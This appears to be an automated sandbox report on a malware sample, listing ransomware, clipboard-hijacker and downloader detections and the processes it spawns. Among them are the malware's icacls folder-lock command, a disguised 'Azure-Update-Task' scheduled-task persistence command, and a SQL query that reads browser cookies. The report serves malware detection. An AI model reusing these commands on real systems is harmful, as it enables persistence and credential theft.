                Source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPEDMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: C:\Users\user\AppData\Local\Temp\9F31.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\3C54.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\6FA9.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: String function: 00407404 appears 35 times
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: build2.exe.19.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                Source: build2[1].exe.19.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                Source: 01860199.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: D804.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C861.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: B46F.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: F4F7.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: A170.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: CBE6.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: B8C8.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: A3D5.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 673.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: EA44.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: D689.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 388B.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BC2.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 57DC.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 3E02.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 913F.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hwgujdv.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ewgujdv.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: D804.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 01860199.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hwgujdvJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@76/330@105/23
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: B46F.exe, 0000001A.00000002.490522313.000000000342C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: S.slNq
                Source: 01860199.exeReversingLabs: Detection: 37%
                Source: 01860199.exeVirustotal: Detection: 38%
                Source: C:\Users\user\Desktop\01860199.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\01860199.exe C:\Users\user\Desktop\01860199.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hwgujdv C:\Users\user\AppData\Roaming\hwgujdv
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
                Source: C:\Users\user\AppData\Local\Temp\C861.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 520
                Source: unknownProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3C54.exe C:\Users\user\AppData\Local\Temp\3C54.exe
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
                Source: C:\Users\user\Desktop\01860199.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeProcess created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\913F.exeProcess created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4F7.exe C:\Users\user\AppData\Local\Temp\F4F7.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5DA0.exe C:\Users\user\AppData\Local\Temp\5DA0.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3C54.exe C:\Users\user\AppData\Local\Temp\3C54.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4F7.exe C:\Users\user\AppData\Local\Temp\F4F7.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5DA0.exe C:\Users\user\AppData\Local\Temp\5DA0.exe
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeProcess created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                Source: C:\Users\user\AppData\Local\Temp\913F.exeProcess created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C120DE80-FDE4-49f5-A713-E902EF062B8A}\InProcServer32
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D804.tmpJump to behavior
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;U/
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                Source: aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.511247742.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
